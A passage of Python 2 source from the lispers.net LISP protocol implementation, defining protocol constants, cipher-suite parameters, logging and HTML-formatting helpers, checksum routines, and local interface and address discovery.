# eid-prefix and rloc-prefix is lisp_address() so longest match lookups can
# be performed. The instance-id value is an array of 2 elements that store
# same value in both elements if not a range or the low and high range values.
#
lisp_glean_mappings = []
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_TEST_MR_INTERVAL = 60 # In units of seconds
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = 5 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
#LISP_RLOC_PROBE_INTERVAL = 60 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10 # In units of seconds
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Apline Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed.
#
def lprint(*args):
if (lisp_debug_logging == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args: print arg,
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text baesd bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socekt.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) > 1):
if (ipv4[0].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data):
if (len(data) < 20):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 40, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is iin form of "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interfaces ones with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
